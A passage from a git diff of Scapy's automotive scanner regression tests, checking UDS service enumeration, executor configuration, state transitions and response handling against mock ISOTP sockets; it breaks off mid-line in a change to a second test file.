dump -assert "PR:" in dump -assert "NR:" in dump -assert "s1" in dump -assert "s2" in dump -assert "Times between request and response:\tMIN: 0.100000\tMAX: 0.900000\tAVG: 0.500000" in dump - - -= Enumerator get_label - -assert Enumerator.get_label(pkts[0].resp) == "PR: PositiveResponse" -assert Enumerator.get_label(pkts[1].resp) == "Timeout" -assert Enumerator.get_label(pkts[2].resp) == "NR: NegativeResponse" -assert Enumerator.get_label(pkts[3].resp, lambda: "positive") == "positive" -assert Enumerator.get_label(pkts[3].resp, lambda: "positive" + hex(pkts[3].req.service)) == "positive" + "0x21" - -= Enumerator completed - -e.state_completed["s1"] = True -e.state_completed["s2"] = True - -assert e.completed diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts new file mode 100644 index 00000000000..d2d54b3ce8f --- /dev/null +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -0,0 +1,1045 @@ +% Regression tests for enumerators + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.scanner.enumerator import _AutomotiveTestCaseScanResult, ServiceEnumerator, StateGenerator, StateGeneratingServiceEnumerator +from scapy.contrib.automotive.scanner.test_case import TestCaseGenerator, AutomotiveTestCase +from scapy.contrib.automotive.scanner.executor import AutomotiveTestCaseExecutor +from scapy.contrib.isotp import ISOTP +from scapy.contrib.automotive.uds import * +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase +from scapy.utils import SingleConversationSocket +from scapy.contrib.automotive.ecu import EcuState, EcuResponse +from scapy.contrib.automotive.uds_ecu_states import * + + ++ Basic checks += ServiceEnumerator basecls checks + +pkts = [ + _AutomotiveTestCaseScanResult(EcuState(session=1), UDS(b"\x20abcd"), UDS(b"\x60abcd"), 1.0, 1.9), + _AutomotiveTestCaseScanResult(EcuState(session=2), UDS(b"\x20abcd"), None, 2.0, None), + _AutomotiveTestCaseScanResult(EcuState(session=1), UDS(b"\x21abcd"), UDS(b"\x7fabcd"), 3.0, 3.1), + _AutomotiveTestCaseScanResult(EcuState(session=2), UDS(b"\x21abcd"), UDS(b"\x7fa\x10cd"), 4.0, 4.5), +] + +class MyTestCase(ServiceEnumerator): + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return UDS(service=range(1, 11)) + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % (tup[1].service, tup[1].sprintf("%UDS.service%")) + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], "PR: Supported") + @staticmethod + def _get_negative_response_label(response): + # type: (Packet) -> str + return response.sprintf("NR: %UDS_NR.negativeResponseCode%") + @staticmethod + def _get_negative_response_code(resp): + # type: (Packet) -> int + return resp.negativeResponseCode + @staticmethod + def _get_negative_response_desc(nrc): + # type: (int) -> str + return UDS_NR(negativeResponseCode=nrc).sprintf( + "%UDS_NR.negativeResponseCode%") + + +e = MyTestCase() +for p in pkts: + p.req.time = p.req_ts + p.req.sent_time = p.req_ts + if p.resp is not None: + p.resp.time = p.resp_ts + e._store_result(p.state, p.req, p.resp) + + += ServiceEnumerator not completed check + +assert e.completed == False + += ServiceEnumerator completed + +e._state_completed[EcuState(session=1)] = True +e._state_completed[EcuState(session=2)] = True + +assert e.completed + += ServiceEnumerator stats check + +stat_list = e._compute_statistics() + +stats = {label: value for state, label, value in stat_list if state == "all"} +print(stats) + +assert stats["num_answered"] == '3' +assert stats["num_unanswered"] == '1' +assert stats["answertime_max"] == '0.9' +assert stats["answertime_min"] == '0.1' +assert stats["answertime_avg"] == '0.5' +assert stats["num_negative_resps"] == '2' + += ServiceEnumerator scanned states + +assert len(e.scanned_states) == 2 +assert {EcuState(session=1), EcuState(session=2)} == e.scanned_states + += ServiceEnumerator scanned results + +assert len(e.results_with_positive_response) == 1 +assert len(e.results_with_negative_response) == 2 +assert len(e.results_without_response) == 1 +assert len(e.results_with_response) == 3 + += ServiceEnumerator get_label +assert e._get_label(pkts[0].resp) == "PR: PositiveResponse" +assert e._get_label(pkts[0].resp, lambda _: "positive") == "positive" +assert e._get_label(pkts[0].resp, lambda _: "positive" + hex(pkts[0].req.service)) == "positive" + "0x20" +assert e._get_label(pkts[1].resp) == "Timeout" +assert e._get_label(pkts[2].resp) == "NR: 98" +assert e._get_label(pkts[3].resp) == "NR: generalReject" + += ServiceEnumerator show + +e.show(filtered=False) + +dump = e.show(dump=True, filtered=False) +assert "NR: 98" in dump +assert "NR: generalReject" in dump +assert "PR: Supported" in dump +assert "Timeout" in dump +assert "session1" in dump +assert "session2" in dump +assert "0x20" in dump +assert "0x21" in dump + += ServiceEnumerator filtered results before show + +print(len(e.filtered_results)) +assert len(e.filtered_results) == 2 +assert e.filtered_results[0] == pkts[0] +assert e.filtered_results[1] == pkts[2] + += ServiceEnumerator show filtered + +e.show(filtered=True) + +dump = e.show(dump=True, filtered=True) +assert "NR: 98" in dump +assert "NR: generalReject" in dump +assert "PR: Supported" in dump +assert "Timeout" not in dump +assert "session1" in dump +assert "session2" in dump +assert "all" in dump +assert "0x20" in dump +assert "0x21" in dump +assert "The following negative response codes are blacklisted: ['serviceNotSupported']" in dump + += ServiceEnumerator filtered results after show + +assert len(e.filtered_results) == 3 +assert e.filtered_results[0] == pkts[0] +assert e.filtered_results[1] == pkts[2] + += ServiceEnumerator supported responses + +assert len(e.supported_responses) == 3 + += ServiceEnumerator evaluate response + +conf = {} + +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), None, **conf) +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x10"), **conf) +conf = {"exit_if_service_not_supported": True, "retry_if_busy_returncode": False} +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x10"), **conf) +assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) +assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) +conf = {"exit_if_service_not_supported": False, "retry_if_busy_returncode": True} +assert e._retry_pkt == None +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x10"), **conf) +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) +assert e._retry_pkt == None +assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) +assert e._retry_pkt == UDS(b"\x10\x03abcd") +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) +assert e._retry_pkt == None + +assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x50\x03\x00"), **conf) +assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x11\x03abcd"), UDS(b"\x51\x03\x00"), **conf) + += ServiceEnumerator execute + +from scapy.modules.six.moves.queue import Queue +from scapy.supersocket import SuperSocket + +class MockISOTPSocket(SuperSocket): + nonblocking_socket = True + @property + def closed(self): + return False + @closed.setter + def closed(self, var): + pass + def __init__(self, rcvd_queue=None): + self.rcvd_queue = Queue() + self.sent_queue = Queue() + if rcvd_queue is not None: + for c in rcvd_queue: + self.rcvd_queue.put(c) + def recv_raw(self, x=MTU): + pkt = bytes(self.rcvd_queue.get(True, 0.01)) + return UDS, pkt, 10.0 + def send(self, x): + sx = raw(x) + try: + x.sent_time = 9.0 + except AttributeError: + pass + self.sent_queue.put(sx) + return len(sx) + @staticmethod + def select(sockets, remain=None): + return sockets + +sock = MockISOTPSocket() +sock.rcvd_queue.put(b"\x41") +sock.rcvd_queue.put(b"\x42") +sock.rcvd_queue.put(b"\x43") +sock.rcvd_queue.put(b"\x44") +sock.rcvd_queue.put(b"\x45") +sock.rcvd_queue.put(b"\x46") +sock.rcvd_queue.put(b"\x47") +sock.rcvd_queue.put(b"\x48") +sock.rcvd_queue.put(b"\x49") +sock.rcvd_queue.put(b"\x4A") + +e = MyTestCase() + +e.execute(sock, EcuState(session=1)) + +assert len(e.filtered_results) == 10 +assert len(e.results_with_response) == 10 +assert len(e.results_without_response) == 0 + +assert e.has_completed(EcuState(session=1)) +assert e.completed + +e.execute(sock, EcuState(session=2), timeout=0.01) + +assert len(e.filtered_results) == 10 +assert len(e.results_with_response) == 10 +assert len(e.results_without_response) == 10 + +assert e.has_completed(EcuState(session=2)) + +e.execute(sock, EcuState(session=3), timeout=0.01, exit_if_no_answer_received=True) + +assert not e.has_completed(EcuState(session=3)) +assert not e.completed +assert len(e.scanned_states) == 3 + += Test negative response code service not supported + +sock.rcvd_queue.put(b"\x7f\x01\x11") +sock.rcvd_queue.put(b"\x7f\x01\x7f") + +e = MyTestCase() + +e.execute(sock, EcuState(session=1), exit_if_service_not_supported=True) + +assert e._retry_pkt is None +assert len(e.results_with_response) == 1 +assert len(e.results_with_negative_response) == 1 +assert e.completed + +e.execute(sock, EcuState(session=2), exit_if_service_not_supported=True) + +assert e._retry_pkt is None +assert len(e.results_with_response) == 2 +assert len(e.results_with_negative_response) == 2 +assert e.completed + += Test negative response code retry if busy + +sock.rcvd_queue.put(b"\x7f\x01\x21") +sock.rcvd_queue.put(b"\x7f\x01\x10") + +e = MyTestCase() + +e.execute(sock, EcuState(session=1)) + +assert e._retry_pkt is not None +assert len(e.results_with_response) == 1 +assert len(e.results_with_negative_response) == 1 +assert len(e.results_without_response) == 0 +assert not e.completed + +e.execute(sock, EcuState(session=1)) + +assert e._retry_pkt is None +assert len(e.results_with_response) == 2 +assert len(e.results_with_negative_response) == 2 +assert len(e.results_without_response) == 9 +assert e.completed +assert e.has_completed(EcuState(session=1)) + += Test negative response code don't retry if busy + +sock.rcvd_queue.put(b"\x7f\x01\x21") + +e = MyTestCase() + +e.execute(sock, EcuState(session=1), retry_if_busy_returncode=False) + +assert e._retry_pkt is None +assert len(e.results_with_response) == 1 +assert len(e.results_with_negative_response) == 1 +assert len(e.results_without_response) == 9 +assert e.completed +assert e.has_completed(EcuState(session=1)) + += Test execution time + +sock.rcvd_queue.put(b"\x7f\x01\x10") + +e = MyTestCase() + +e.execute(sock, EcuState(session=1), execution_time=-1) + +assert e._retry_pkt is None +assert len(e.results_with_response) == 1 +assert len(e.results_with_negative_response) == 1 +assert len(e.results_without_response) == 0 +assert not e.completed +assert not e.has_completed(EcuState(session=1)) + + ++ AutomotiveTestCaseExecutorConfiguration tests + += Definitions + +class MockSock(object): + def sr1(self, *args, **kwargs): + raise OSError + +class TestCase1(MyTestCase): + pass + +class TestCase2(MyTestCase): + pass + +class Scanner(AutomotiveTestCaseExecutor): + @property + def default_test_case_clss(self): + # type: () -> List[Type[AutomotiveTestCaseABC]] + return [MyTestCase] + += Basic tests + +tce = Scanner(MockSock(), test_cases=[TestCase1, TestCase2, MyTestCase], + verbose=True, delay_state_change=42, debug=True, + global_arg="Whatever", TestCase1_kwargs={"local_kwarg": 42}) + +config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration +assert config.delay_state_change == 42 +assert config.verbose +assert config.debug +assert len(config.test_cases) == 3 +assert len(config.stages) == 0 +assert len(config.staged_test_cases) == 0 +assert len(config.test_case_clss) == 3 +assert len(config.TestCase1.items()) == 5 +assert len(config.TestCase2.items()) == 4 +assert len(config["TestCase1"].items()) == 5 +assert len(config.MyTestCase.items()) == 4 +assert config.TestCase1["verbose"] +assert config.TestCase1["debug"] +assert config.TestCase1["local_kwarg"] == 42 +assert config.TestCase1["global_arg"] == "Whatever" +assert config.TestCase2["global_arg"] == "Whatever" +assert config.MyTestCase["global_arg"] == "Whatever" +assert isinstance(tce.socket, SingleConversationSocket) + + += Basic tests with default values + +tce = Scanner(MockSock()) + +config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration +assert config.delay_state_change == 0.5 +assert not config.verbose +assert not config.debug +assert len(config.test_cases) == 1 +assert len(config.MyTestCase.items()) == 0 +assert isinstance(tce.socket, SingleConversationSocket) + + += Basic test with stages + +def connector(testcase1, _): + scan_range = len(testcase1.results) + return {"verbose": True, "scan_range": scan_range} + +tc1 = TestCase1() +tc2 = TestCase2() + +pipeline = StagedAutomotiveTestCase([tc1, tc2], [None, connector]) + +tce = Scanner(MockSock(), test_cases=[pipeline]) + +config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration +assert config.delay_state_change == 0.5 +assert not config.verbose +assert not config.debug +assert len(config.test_cases) == 1 +assert len(config.stages) == 1 +assert len(config.staged_test_cases) == 2 +assert len(config.test_case_clss) == 3 +assert len(config.StagedAutomotiveTestCase.items()) == 0 +assert isinstance(tce.socket, SingleConversationSocket) + += Basic tests with two stages + +def connector(testcase1, testcase2): + scan_range = len(testcase1.results) + return {"verbose": True, "scan_range": scan_range} + +tc1 = TestCase1() +tc2 = TestCase2() + +pipeline = StagedAutomotiveTestCase([tc1, tc2], [None, connector]) + +class StagedTest(StagedAutomotiveTestCase): + pass + +pipeline2 = StagedTest([MyTestCase(), MyTestCase()]) + +tce = Scanner(MockSock(), test_cases=[pipeline, pipeline2], verbose=True) + +config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration +assert config.delay_state_change == 0.5 +assert config.verbose +assert not config.debug +assert len(config.test_cases) == 2 +assert len(config.stages) == 2 +assert len(config.staged_test_cases) == 4 +assert len(config.test_case_clss) == 5 +assert len(config.StagedAutomotiveTestCase.items()) == 1 +assert len(config.StagedTest.items()) == 1 +assert len(config.TestCase1.items()) == 1 +assert len(config.TestCase2.items()) == 1 +assert len(config.MyTestCase.items()) == 1 + +assert isinstance(tce.socket, SingleConversationSocket) + +assert len(tce.state_paths) == 1 +assert len(tce.final_states) == 1 + +tce.state_graph.add_edge((tce.final_states[0], EcuState(session=2))) + +assert len(tce.state_paths) == 2 +assert len(tce.final_states) == 2 + +assert not tce.scan_completed + + += Reset Handler tests + +reset_flag = False + +def reset_func(): + global reset_flag + reset_flag = True + +tce = Scanner(MockSock(), reset_handler=reset_func) +tce.target_state = EcuState(session=2) +tce.reset_target() + +assert reset_flag +assert tce.target_state == EcuState(session=1) + += Reset Handler tests 2 + +tce = Scanner(MockSock()) +tce.target_state = EcuState(session=2) +tce.reset_target() + +assert tce.target_state == EcuState(session=1) + += Reconnect Handler tests + +class MockSocket2: + pass + +def reconnect_func(): + return MockSocket2() + +tce = Scanner(MockSock(), reconnect_handler=reconnect_func) + +print(tce.socket) +print(repr(tce.socket)) +assert isinstance(tce.socket._inner, MockSock) +tce.reconnect() +assert isinstance(tce.socket._inner, MockSocket2) + += Reconnect Handler tests 2 + +closed = False + +class MockSocket1: + def close(self): + global closed + closed = True + +class MockSocket2: + pass + +def reconnect_func(): + return MockSocket2() + +tce = Scanner(MockSocket1(), reconnect_handler=reconnect_func) + +print(tce.socket) +print(repr(tce.socket)) +assert isinstance(tce.socket._inner, MockSocket1) +tce.reconnect() +assert isinstance(tce.socket._inner, MockSocket2) +assert closed + += TestCase execute + +pre_exec = False +execute = False +post_exec = False + +class TestCase42(MyTestCase): + def pre_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None + global pre_exec + assert state == EcuState(session=1) + assert global_configuration.TestCase42["local_kwarg"] == 42 + assert global_configuration.TestCase42["delay_state_change"] == 42 + assert global_configuration.TestCase42["verbose"] + assert global_configuration.TestCase42["debug"] + global_configuration.TestCase42["local_kwarg"] = 1 + pre_exec = True + def execute(self, socket, state, local_kwarg, verbose, debug, **kwargs): + global execute + assert verbose + assert debug + assert local_kwarg == 1 + assert kwargs["delay_state_change"] == 42 + execute = True + def post_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None + global post_exec + assert global_configuration.TestCase42["local_kwarg"] == 1 + assert global_configuration.TestCase42["delay_state_change"] == 42 + assert global_configuration.TestCase42["verbose"] + assert global_configuration.TestCase42["debug"] + post_exec = True + + +tce = Scanner(MockSock(), test_cases=[TestCase42], + verbose=True, delay_state_change=42, debug=True, + TestCase42_kwargs={"local_kwarg": 42}) + +tce.execute_test_case(TestCase42()) +assert pre_exec == execute == post_exec == True + + += TestCase execute StateGenerator + +transition_done = False + +def transition_func(sock, conf, kwargs): + assert kwargs["arg42"] == "hello" + assert conf.TestCase43["local_kwarg"] == "world" + global transition_done + transition_done = True + return True + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + assert config.TestCase43["local_kwarg"] == "world" + return EcuState(session=1), EcuState(session=2) + def get_transition_function(self, socket, edge): + assert edge[0] == EcuState(session=1) + assert edge[1] == EcuState(session=2) + return transition_func, {"arg42": "hello"}, None + def execute(self, socket, state, **kwargs): + return True + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + TestCase43_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +assert tce.enter_state(EcuState(session=1), EcuState(session=2)) +assert transition_done + + += TestCase execute StateGenerator no edge + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + assert config.TestCase43["local_kwarg"] == "world" + return None + def execute(self, socket, state, **kwargs): + return True + def get_transition_function(self, socket, edge): + raise NotImplementedError() + +tce = Scanner(MockSock(), test_cases=[TestCase43], + TestCase43_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 1 +assert EcuState(session=1) in tce.final_states +assert not tce.enter_state(EcuState(session=1), EcuState(session=2)) + + += TestCase execute StateGenerator with cleanupfunc + +transition_done = False +cleanup_done = False + +def transition_func(sock, conf, kwargs): + assert kwargs["arg42"] == "hello" + assert conf.TestCase43["local_kwarg"] == "world" + global transition_done + transition_done = True + return True + +def cleanup_func(sock, conf): + assert conf.TestCase43["local_kwarg"] == "world" + global cleanup_done + cleanup_done = True + return True + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + assert config.TestCase43["local_kwarg"] == "world" + return EcuState(session=1), EcuState(session=2) + def get_transition_function(self, socket, edge): + assert edge[0] == EcuState(session=1) + assert edge[1] == EcuState(session=2) + return transition_func, {"arg42": "hello"}, cleanup_func + def execute(self, socket, state, **kwargs): + return True + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + TestCase43_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +assert not len(tce.cleanup_functions) +assert tce.enter_state(EcuState(session=1), EcuState(session=2)) +assert transition_done +assert len(tce.cleanup_functions) +tce.cleanup_state() +assert not len(tce.cleanup_functions) +assert cleanup_done + + += TestCase execute StateGenerator with not callable cleanupfunc + +transition_done = False + +def transition_func(sock, conf, kwargs): + assert kwargs["arg42"] == "hello" + assert conf.TestCase43["local_kwarg"] == "world" + global transition_done + transition_done = True + return True + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + assert config.TestCase43["local_kwarg"] == "world" + return EcuState(session=1), EcuState(session=2) + def get_transition_function(self, socket, edge): + assert edge[0] == EcuState(session=1) + assert edge[1] == EcuState(session=2) + return transition_func, {"arg42": "hello"}, "fake" + def execute(self, socket, state, **kwargs): + return True + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + TestCase43_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +assert not len(tce.cleanup_functions) +assert tce.enter_state(EcuState(session=1), EcuState(session=2)) +assert transition_done +assert len(tce.cleanup_functions) +tce.cleanup_state() +assert not len(tce.cleanup_functions) + += TestCase execute StateGenerator with cleanupfunc negative return + +transition_done = False +cleanup_done = False + +def transition_func(sock, conf, kwargs): + assert kwargs["arg42"] == "hello" + assert conf.TestCase43["local_kwarg"] == "world" + global transition_done + transition_done = True + return True + +def cleanup_func(sock, conf): + assert conf.TestCase43["local_kwarg"] == "world" + global cleanup_done + cleanup_done = True + return False + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + assert config.TestCase43["local_kwarg"] == "world" + return EcuState(session=1), EcuState(session=2) + def get_transition_function(self, socket, edge): + assert edge[0] == EcuState(session=1) + assert edge[1] == EcuState(session=2) + return transition_func, {"arg42": "hello"}, cleanup_func + def execute(self, socket, state, **kwargs): + return True + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + TestCase43_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +assert not len(tce.cleanup_functions) +assert tce.enter_state(EcuState(session=1), EcuState(session=2)) +assert transition_done +assert len(tce.cleanup_functions) +tce.cleanup_state() +assert not len(tce.cleanup_functions) +assert cleanup_done + + += TestCase execute StateGenerator with cleanupfunc and path + +transition_done1 = False +cleanup_done1 = False +transition_done2 = False +cleanup_done2 = False + +transition_error = False + + +def transition_func1(sock, conf, kwargs): + global transition_done1 + transition_done1 = True + return True + +def cleanup_func1(sock, conf): + global cleanup_done1 + cleanup_done1 = True + return True + +def transition_func2(sock, conf, kwargs): + global transition_done2 + transition_done2 = True + return not transition_error + +def cleanup_func2(sock, conf): + global cleanup_done2 + cleanup_done2 = True + return True + +class TestCase43(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + return EcuState(session=1), EcuState(session=2) + def get_transition_function(self, socket, edge): + return transition_func1, {"arg42": "hello"}, cleanup_func1 + def execute(self, socket, state, **kwargs): + return True + +class TestCase44(MyTestCase, StateGenerator): + def get_new_edge(self, socket, config): + return EcuState(session=2), EcuState(session=3) + def get_transition_function(self, socket, edge): + return transition_func2, None, cleanup_func2 + def execute(self, socket, state, **kwargs): + return True + +reset_done = False + +def reset_func(): + global reset_done + reset_done = True + +reconnect_done = False + +def reconnect_func(): + global reconnect_done + reconnect_done = True + return MockSock() + +tce = Scanner(MockSock(), test_cases=[TestCase43, TestCase44], + reset_handler=reset_func, reconnect_handler=reconnect_func) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +tce.execute_test_case(TestCase44()) +assert len(tce.final_states) == 3 +assert EcuState(session=3) in tce.final_states and EcuState(session=2) in tce.final_states + +assert not len(tce.cleanup_functions) +assert tce.enter_state_path([EcuState(session=1), EcuState(session=2), EcuState(session=3)]) +assert transition_done1 +assert transition_done2 +assert len(tce.cleanup_functions) == 2 +assert reconnect_done +assert reset_done +tce.cleanup_state() +assert cleanup_done1 +assert cleanup_done2 + +try: + tce.enter_state_path([EcuState(session=3)]) + assert False +except Scapy_Exception: + assert True + += Test downrate edge + +transition_done1 = False +cleanup_done1 = False + +tce = Scanner(MockSock(), test_cases=[TestCase43, TestCase44], + reset_handler=reset_func, reconnect_handler=reconnect_func) + +assert len(tce.final_states) == 1 +tce.execute_test_case(TestCase43()) +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=2) in tce.final_states +tce.execute_test_case(TestCase44()) +assert len(tce.final_states) == 3 +assert EcuState(session=3) in tce.final_states and EcuState(session=2) in tce.final_states + +assert not len(tce.cleanup_functions) +transition_error = True +assert not tce.enter_state_path([EcuState(session=1), EcuState(session=2), EcuState(session=3)]) +assert transition_done1 +assert cleanup_done1 +assert len(tce.cleanup_functions) == 0 +assert tce.state_graph.weights[(EcuState(session=1), EcuState(session=2))] == 1 +assert tce.state_graph.weights[(EcuState(session=2), EcuState(session=3))] == 2 + + += TestCase execute TestCaseGenerator + +tc_executed = False + +class GeneratedTestCase(MyTestCase): + def execute(self, socket, state, **kwargs): + assert kwargs["local_kwarg"] == "world" + global tc_executed + tc_executed = True + return True + + +class TestCase43(MyTestCase, TestCaseGenerator): + def execute(self, socket, state, **kwargs): + return True + def get_generated_test_case(self): + return GeneratedTestCase() + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + GeneratedTestCase_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 +assert len(tce.configuration.test_cases) == 1 + +tce.execute_test_case(tce.configuration.test_cases[0]) + +assert len(tce.configuration.test_cases) == 2 + +tce.execute_test_case(tce.configuration.test_cases[1]) + +assert tc_executed + += TestCase scan timeout + +tc_executed = False + +class GeneratedTestCase(MyTestCase): + def execute(self, socket, state, **kwargs): + assert kwargs["local_kwarg"] == "world" + global tc_executed + tc_executed = True + return True + + +tce = Scanner(MockSock(), test_cases=[GeneratedTestCase], + GeneratedTestCase_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 +assert len(tce.configuration.test_cases) == 1 + +tce.scan(-1) + +assert not tc_executed + + += TestCase scan + +tc_executed = False + +class GeneratedTestCase(MyTestCase): + def execute(self, socket, state, **kwargs): + assert kwargs["local_kwarg"] == "world" + global tc_executed + tc_executed = True + self._state_completed[state] = True + return True + + +class TestCase43(MyTestCase, TestCaseGenerator): + def execute(self, socket, state, **kwargs): + self._state_completed[state] = True + return True + def get_generated_test_case(self): + return GeneratedTestCase() + + +tce = Scanner(MockSock(), test_cases=[TestCase43], + GeneratedTestCase_kwargs={"local_kwarg": "world"}) + +assert len(tce.final_states) == 1 +assert len(tce.configuration.test_cases) == 1 + +tce.scan() + +assert len(tce.configuration.test_cases) == 2 +assert tc_executed +assert tce.scan_completed + += Test supported responses + +class MyTestCase1(AutomotiveTestCase): + _description = "MyTestCase1" + @property + def supported_responses(self): + return [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"de")), + EcuResponse([EcuState(session=2), EcuState(security_level=6)], responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"dea2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x13))] + + +class MyTestCase2(AutomotiveTestCase): + _description = "MyTestCase2" + @property + def supported_responses(self): + return [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef1")), + EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=6) / Raw(b"deadbeef2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x10, requestServiceId=0x11))] + + +tce = Scanner(MockSock(), test_cases=[MyTestCase1(), MyTestCase2()]) + +resps = tce.supported_responses + +assert len(resps) == 6 +assert resps[0].responses[0].service != 0x7f +assert resps[1].responses[0].service != 0x7f +assert resps[2].responses[0].service != 0x7f +assert resps[3].responses[0].service != 0x7f + +assert resps[4].responses[0].service == 0x7f +assert resps[5].responses[0].service == 0x7f + +assert resps[0].responses[0].load == b"dea2" +assert resps[1].responses[0].load == b"deadbeef1" +assert resps[2].responses[0].load == b"deadbeef2" +assert resps[3].responses[0].load == b"de" +assert resps[4].responses[0].requestServiceId == 0x13 +assert resps[5].responses[0].requestServiceId == 0x11 + += Test show testcases + +try: + tce.show_testcases() + assert True +except Exception: + assert False + + +try: + tce.show_testcases_status() + assert True +except Exception: + assert False + += Test StateGeneratingServiceEnumerator + +class TestCase43(MyTestCase, StateGeneratingServiceEnumerator): + def execute(self, socket, state, **kwargs): + return True + @property + def results(self): # type: () -> List[_AutomotiveTestCaseScanResult] + return [_AutomotiveTestCaseScanResult(EcuState(session=1), UDS()/UDS_DSC(b"\x03"), UDS()/UDS_DSCPR(b"\x03"), 1.1, 1.2)] + +tce = Scanner(MockSock(), test_cases=[TestCase43]) + +assert len(tce.final_states) == 1 + +tce.execute_test_case(TestCase43()) + +assert len(tce.final_states) == 2 +assert EcuState(session=1) in tce.final_states and EcuState(session=3) in tce.final_states + +tf, args, cf = tce.state_graph.get_transition_tuple_for_edge((EcuState(session=1), EcuState(session=3))) + +assert cf is None +assert tf is not None +assert len(args) == 2 +assert args["req"] == UDS()/UDS_DSC(b"\x03") +assert "diagnosticSessionType" in args["desc"] and "extendedDiagnosticSession" in args["desc"] + +assert not tce.enter_state(EcuState(session=1), EcuState(session=3)) \ No newline at end of file diff --git a/test/contrib/automotive/scanner/staged_test_case.uts b/test/contrib/automotive/scanner/staged_test_case.uts index d52c2a2ac82..cc6d37d3144 100644 --- a/test/contrib/automotive/scanner/staged_test_case.uts +++ b/test/contrib/automotive/scanner/staged_test_case.uts @@ -5,22 +5,33 @@ = Load contribution layer from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase -from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.ecu import EcuState, EcuResponse from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase +from scapy.contrib.automotive.uds import UDS, UDS_RDBIPR, UDS_NR +from scapy.packet import Raw + Basic checks = Definition of Test classes + class MyTestCase1(AutomotiveTestCase): _description = "MyTestCase1" + @property def supported_responses(self): - return [] + return [EcuResponse(EcuState(session=2), responses=UDS() / 